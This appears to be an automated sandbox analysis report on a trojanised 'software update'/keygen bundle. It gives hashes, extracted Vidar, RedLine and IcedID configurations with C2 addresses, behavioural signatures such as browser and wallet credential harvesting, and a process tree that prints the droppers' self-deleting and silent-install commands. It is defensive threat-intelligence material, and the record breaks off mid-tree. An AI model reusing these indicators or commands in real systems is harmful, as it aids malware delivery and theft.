Resubmissions

21-10-2021 13:12

211021-qft5msach5 10

21-10-2021 13:05

211021-qbjs4sacg9 10

Analysis

  • max time kernel
    86s
  • max time network
    719s
  • platform
    windows10_x64
  • resource
    win10-en-20210920
  • submitted
    21-10-2021 13:12

General

  • Target

    Software-update-patc_579570356.sfx.exe

  • Size

    28.5MB

  • MD5

    b64a9d5a67665275d9cbb1d320f1361a

  • SHA1

    3935a3994cb12a69ece3517a63eb35820761feaf

  • SHA256

    28b8658e761beebef9578a13e60f231b7bd5af81107210c06ac108276e9447b9

  • SHA512

    261b47e9218c1531b31ea4ba9a7aa89d5a28b7f0c4c8e4b8196acec7cbd107b31c169eb2fdcde324eeb5e8427298508d39260da82026125c199b2d146cf71d37

Malware Config

Extracted

Family

vidar

Version

41.5

Botnet

223

C2

https://mas.to/@xeroxxx

Attributes
  • profile_id

    223

Extracted

Family

redline

Botnet

123ikjrvd

C2

87.251.71.82:80

Extracted

Family

icedid

Campaign

1926014661

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • IcedID, BokBot

    IcedID is a banking trojan capable of stealing credentials.

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 3 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • ACProtect 1.3x - 1.4x DLL software 2 IoCs

    Detects file using ACProtect software.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 1 IoCs
  • Blocklisted process makes network request 9 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 3 IoCs
  • Executes dropped EXE 28 IoCs
  • Modifies Windows Firewall 1 TTPs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Identifies Wine through registry keys 2 TTPs 1 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 34 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 9 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 17 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • autoit_exe 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 26 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 18 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 8 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 2 IoCs
  • Kills process with taskkill 17 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 48 IoCs
  • Modifies system certificate store 2 TTPs 26 IoCs
  • Runs ping.exe 1 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 62 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Software-update-patc_579570356.sfx.exe
    "C:\Users\Admin\AppData\Local\Temp\Software-update-patc_579570356.sfx.exe"
    1⤵
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:3552
  • C:\Users\Admin\Desktop\Recovery_Toolbox_For_Cd_Free_2_serial_keygen.exe
    "C:\Users\Admin\Desktop\Recovery_Toolbox_For_Cd_Free_2_serial_keygen.exe"
    1⤵
    • Executes dropped EXE
    • Suspicious use of FindShellTrayWindow
    PID:4556
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
      2⤵
        PID:3052
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
          keygen-pr.exe -p83fsase3Ge
          3⤵
            PID:4236
            • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
              "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
              4⤵
                PID:4244
                • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                  C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
                  5⤵
                    PID:1196
              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
                keygen-step-1.exe
                3⤵
                  PID:2124
                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-6.exe
                  keygen-step-6.exe
                  3⤵
                    PID:2292
                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
                    keygen-step-3.exe
                    3⤵
                      PID:2404
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
                        4⤵
                          PID:2180
                          • C:\Windows\SysWOW64\PING.EXE
                            ping 1.1.1.1 -n 1 -w 3000
                            5⤵
                            • Runs ping.exe
                            PID:2212
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
                        keygen-step-4.exe
                        3⤵
                          PID:1296
                          • C:\Users\Admin\AppData\Local\Temp\RarSFX2\KiffAppE2.exe
                            "C:\Users\Admin\AppData\Local\Temp\RarSFX2\KiffAppE2.exe"
                            4⤵
                              PID:4060
                              • C:\Users\Admin\Documents\PlsWnEU2.exe
                                "C:\Users\Admin\Documents\PlsWnEU2.exe"
                                5⤵
                                  PID:2400
                                  • C:\Users\Admin\Documents\PlsWnEU2.exe
                                    C:\Users\Admin\Documents\PlsWnEU2.exe
                                    6⤵
                                      PID:3668
                                • C:\Users\Admin\AppData\Local\Temp\RarSFX2\Crack.exe
                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Crack.exe"
                                  4⤵
                                    PID:5444
                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX2\DownFlSetup133.exe
                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX2\DownFlSetup133.exe"
                                    4⤵
                                      PID:4404
                                      • C:\Users\Admin\AppData\Roaming\525093.exe
                                        "C:\Users\Admin\AppData\Roaming\525093.exe"
                                        5⤵
                                          PID:7556
                                        • C:\Users\Admin\AppData\Roaming\5704187.exe
                                          "C:\Users\Admin\AppData\Roaming\5704187.exe"
                                          5⤵
                                            PID:2396
                                          • C:\Users\Admin\AppData\Roaming\3658051.exe
                                            "C:\Users\Admin\AppData\Roaming\3658051.exe"
                                            5⤵
                                              PID:7932
                                              • C:\Windows\System32\Conhost.exe
                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                6⤵
                                                • Executes dropped EXE
                                                PID:4968
                                            • C:\Users\Admin\AppData\Roaming\4785864.exe
                                              "C:\Users\Admin\AppData\Roaming\4785864.exe"
                                              5⤵
                                                PID:6068
                                              • C:\Users\Admin\AppData\Roaming\1873656.exe
                                                "C:\Users\Admin\AppData\Roaming\1873656.exe"
                                                5⤵
                                                  PID:2984
                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX2\md1_1eaf.exe
                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX2\md1_1eaf.exe"
                                                4⤵
                                                  PID:8168
                                          • C:\Users\Admin\Desktop\Software-update-patc_535592163.exe
                                            "C:\Users\Admin\Desktop\Software-update-patc_535592163.exe"
                                            1⤵
                                            • Executes dropped EXE
                                            • Suspicious use of WriteProcessMemory
                                            PID:644
                                            • C:\Users\Admin\AppData\Local\Temp\is-TQ5KN.tmp\Software-update-patc_535592163.tmp
                                              "C:\Users\Admin\AppData\Local\Temp\is-TQ5KN.tmp\Software-update-patc_535592163.tmp" /SL5="$70080,4479401,466944,C:\Users\Admin\Desktop\Software-update-patc_535592163.exe"
                                              2⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              • Drops file in Program Files directory
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of FindShellTrayWindow
                                              • Suspicious use of WriteProcessMemory
                                              PID:1196
                                              • C:\Program Files (x86)\Ut\quam\Exercitationem.exe
                                                "C:\Program Files (x86)\Ut/\quam\Exercitationem.exe" 8208c5e16842608234b91821ef4b1c3f
                                                3⤵
                                                • Executes dropped EXE
                                                • Modifies registry class
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of WriteProcessMemory
                                                PID:1088
                                                • C:\Users\Admin\AppData\Local\Temp\qT4leffV\UR1E1OJkSMSPSwU0.exe
                                                  C:\Users\Admin\AppData\Local\Temp\qT4leffV\UR1E1OJkSMSPSwU0.exe /usthree SUB=8208c5e16842608234b91821ef4b1c3f
                                                  4⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of SetThreadContext
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:1312
                                                  • C:\Users\Admin\AppData\Local\Temp\qT4leffV\UR1E1OJkSMSPSwU0.exe
                                                    C:\Users\Admin\AppData\Local\Temp\qT4leffV\UR1E1OJkSMSPSwU0.exe /usthree SUB=8208c5e16842608234b91821ef4b1c3f
                                                    5⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:4916
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /c taskkill /im "UR1E1OJkSMSPSwU0.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\qT4leffV\UR1E1OJkSMSPSwU0.exe" & exit
                                                      6⤵
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:2180
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /im "UR1E1OJkSMSPSwU0.exe" /f
                                                        7⤵
                                                        • Kills process with taskkill
                                                        PID:3052
                                                • C:\Users\Admin\AppData\Local\Temp\B4c6oRcW\kahRa2R1.exe
                                                  C:\Users\Admin\AppData\Local\Temp\B4c6oRcW\kahRa2R1.exe /VERYSILENT
                                                  4⤵
                                                  • Executes dropped EXE
                                                  • Modifies system certificate store
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:4720
                                                  • C:\Users\Admin\AppData\Local\Temp\Zembra.exe
                                                    C:\Users\Admin\AppData\Local\Temp\Zembra.exe
                                                    5⤵
                                                    • Executes dropped EXE
                                                    • Checks BIOS information in registry
                                                    • Identifies Wine through registry keys
                                                    • Loads dropped DLL
                                                    • Checks whether UAC is enabled
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    • Checks processor information in registry
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:2964
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /c taskkill /im Zembra.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Zembra.exe" & del C:\ProgramData\*.dll & exit
                                                      6⤵
                                                        PID:1840
                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                          taskkill /im Zembra.exe /f
                                                          7⤵
                                                          • Kills process with taskkill
                                                          PID:2472
                                                        • C:\Windows\SysWOW64\timeout.exe
                                                          timeout /t 6
                                                          7⤵
                                                          • Delays execution with timeout.exe
                                                          PID:3764
                                                    • C:\Users\Admin\AppData\Local\Temp\ZembraBro.exe
                                                      C:\Users\Admin\AppData\Local\Temp\ZembraBro.exe
                                                      5⤵
                                                        PID:1680
                                                        • C:\Users\Admin\AppData\Local\Temp\ZembraBro.exe
                                                          C:\Users\Admin\AppData\Local\Temp\ZembraBro.exe
                                                          6⤵
                                                          • Executes dropped EXE
                                                          PID:5040
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\B4c6oRcW\kahRa2R1.exe & exit
                                                        5⤵
                                                          PID:2984
                                                          • C:\Windows\SysWOW64\PING.EXE
                                                            ping 0
                                                            6⤵
                                                            • Runs ping.exe
                                                            PID:4968
                                                      • C:\Users\Admin\AppData\Local\Temp\ZH8xtvo4\oAKAmWkbAngMjKcBt.exe
                                                        C:\Users\Admin\AppData\Local\Temp\ZH8xtvo4\oAKAmWkbAngMjKcBt.exe /quiet SILENT=1 AF=606x8208c5e16842608234b91821ef4b1c3f
                                                        4⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Enumerates connected drives
                                                        • Modifies system certificate store
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        • Suspicious use of FindShellTrayWindow
                                                        • Suspicious use of WriteProcessMemory
                                                        PID:4880
                                                        • C:\Windows\SysWOW64\msiexec.exe
                                                          "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=606x8208c5e16842608234b91821ef4b1c3f AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\ZH8xtvo4\oAKAmWkbAngMjKcBt.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ZH8xtvo4\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1634531721 /quiet SILENT=1 AF=606x8208c5e16842608234b91821ef4b1c3f " AF="606x8208c5e16842608234b91821ef4b1c3f" AI_EXTEND_GLASS="26"
                                                          5⤵
                                                            PID:1348
                                                        • C:\Users\Admin\AppData\Local\Temp\IyeciJio\vpn.exe
                                                          C:\Users\Admin\AppData\Local\Temp\IyeciJio\vpn.exe /silent /subid=510x8208c5e16842608234b91821ef4b1c3f
                                                          4⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of WriteProcessMemory
                                                          PID:4024
                                                          • C:\Users\Admin\AppData\Local\Temp\is-GOVD6.tmp\vpn.tmp
                                                            "C:\Users\Admin\AppData\Local\Temp\is-GOVD6.tmp\vpn.tmp" /SL5="$40286,15170975,270336,C:\Users\Admin\AppData\Local\Temp\IyeciJio\vpn.exe" /silent /subid=510x8208c5e16842608234b91821ef4b1c3f
                                                            5⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Drops file in Program Files directory
                                                            • Modifies system certificate store
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            • Suspicious use of FindShellTrayWindow
                                                            • Suspicious use of WriteProcessMemory
                                                            PID:4536
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                              6⤵
                                                              • Suspicious use of WriteProcessMemory
                                                              PID:2188
                                                              • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                tapinstall.exe remove tap0901
                                                                7⤵
                                                                • Executes dropped EXE
                                                                • Checks SCSI registry key(s)
                                                                PID:4208
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                                              6⤵
                                                              • Suspicious use of WriteProcessMemory
                                                              PID:3940
                                                              • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                tapinstall.exe install OemVista.inf tap0901
                                                                7⤵
                                                                • Executes dropped EXE
                                                                • Drops file in System32 directory
                                                                • Drops file in Windows directory
                                                                • Checks SCSI registry key(s)
                                                                • Modifies system certificate store
                                                                PID:3156
                                                            • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                              "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                                              6⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              PID:1844
                                                            • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                              "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                                              6⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              PID:908
                                                  • C:\Windows\System32\rundll32.exe
                                                    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                    1⤵
                                                      PID:3740
                                                    • C:\Windows\system32\msiexec.exe
                                                      C:\Windows\system32\msiexec.exe /V
                                                      1⤵
                                                      • Enumerates connected drives
                                                      • Drops file in Windows directory
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:604
                                                      • C:\Windows\syswow64\MsiExec.exe
                                                        C:\Windows\syswow64\MsiExec.exe -Embedding 6076792F8FAE51033604C8B6B14224A7 C
                                                        2⤵
                                                        • Loads dropped DLL
                                                        PID:1788
                                                      • C:\Windows\syswow64\MsiExec.exe
                                                        C:\Windows\syswow64\MsiExec.exe -Embedding 4BA0A3F9CC808604D8E09BC1EFBAF701
                                                        2⤵
                                                        • Blocklisted process makes network request
                                                        • Loads dropped DLL
                                                        PID:2284
                                                        • C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu12912263469836d.exe
                                                          Thu12912263469836d.exe
                                                          3⤵
                                                            PID:4880
                                                            • C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu12912263469836d.exe
                                                              C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu12912263469836d.exe
                                                              4⤵
                                                                PID:5152
                                                          • C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe
                                                            "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"
                                                            2⤵
                                                              PID:916
                                                              • C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe
                                                                "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=606x8208c5e16842608234b91821ef4b1c3f -BF=default -uncf=default
                                                                3⤵
                                                                  PID:2984
                                                                  • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                    "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" "--U4miRxC"
                                                                    4⤵
                                                                      PID:6628
                                                                      • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                        C:\Users\Admin\AppData\Roaming\Weather\Weather.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Weather\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Weather\User Data" --annotation=plat=Win64 --annotation=prod=Weather --annotation=ver=0.0.2 --initial-client-data=0x1e8,0x1ec,0x1f0,0x1c4,0x1f4,0x7ffdb6219ec0,0x7ffdb6219ed0,0x7ffdb6219ee0
                                                                        5⤵
                                                                          PID:4608
                                                                          • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                            C:\Users\Admin\AppData\Roaming\Weather\Weather.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Weather\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Weather --annotation=ver=0.0.2 --initial-client-data=0x154,0x158,0x15c,0x130,0x160,0x7ff685704e60,0x7ff685704e70,0x7ff685704e80
                                                                            6⤵
                                                                              PID:6436
                                                                          • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                            "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1688,11578708602371272631,8421185085121022843,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6628_1838200528" --mojo-platform-channel-handle=1772 /prefetch:8
                                                                            5⤵
                                                                              PID:892
                                                                            • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                              "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1688,11578708602371272631,8421185085121022843,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6628_1838200528" --mojo-platform-channel-handle=2084 /prefetch:8
                                                                              5⤵
                                                                                PID:6536
                                                                              • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1688,11578708602371272631,8421185085121022843,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6628_1838200528" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1712 /prefetch:2
                                                                                5⤵
                                                                                  PID:3964
                                                                                • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                  "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Weather\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1688,11578708602371272631,8421185085121022843,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6628_1838200528" --nwjs --extension-process --enable-auto-reload --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2576 /prefetch:1
                                                                                  5⤵
                                                                                    PID:760
                                                                                  • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                    "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1688,11578708602371272631,8421185085121022843,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6628_1838200528" --mojo-platform-channel-handle=3136 /prefetch:8
                                                                                    5⤵
                                                                                      PID:8424
                                                                                    • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1688,11578708602371272631,8421185085121022843,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6628_1838200528" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=2040 /prefetch:2
                                                                                      5⤵
                                                                                        PID:8692
                                                                                      • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1688,11578708602371272631,8421185085121022843,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6628_1838200528" --mojo-platform-channel-handle=3500 /prefetch:8
                                                                                        5⤵
                                                                                          PID:1084
                                                                                        • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                          "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1688,11578708602371272631,8421185085121022843,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6628_1838200528" --mojo-platform-channel-handle=3524 /prefetch:8
                                                                                          5⤵
                                                                                            PID:8564
                                                                                          • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                            "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1688,11578708602371272631,8421185085121022843,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6628_1838200528" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1384 /prefetch:2
                                                                                            5⤵
                                                                                              PID:5500
                                                                                            • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                              "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1688,11578708602371272631,8421185085121022843,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6628_1838200528" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=3436 /prefetch:2
                                                                                              5⤵
                                                                                                PID:9612
                                                                                              • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1688,11578708602371272631,8421185085121022843,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6628_1838200528" --mojo-platform-channel-handle=1664 /prefetch:8
                                                                                                5⤵
                                                                                                  PID:9680
                                                                                                • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                  "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1688,11578708602371272631,8421185085121022843,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6628_1838200528" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1668 /prefetch:2
                                                                                                  5⤵
                                                                                                    PID:10120
                                                                                                  • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
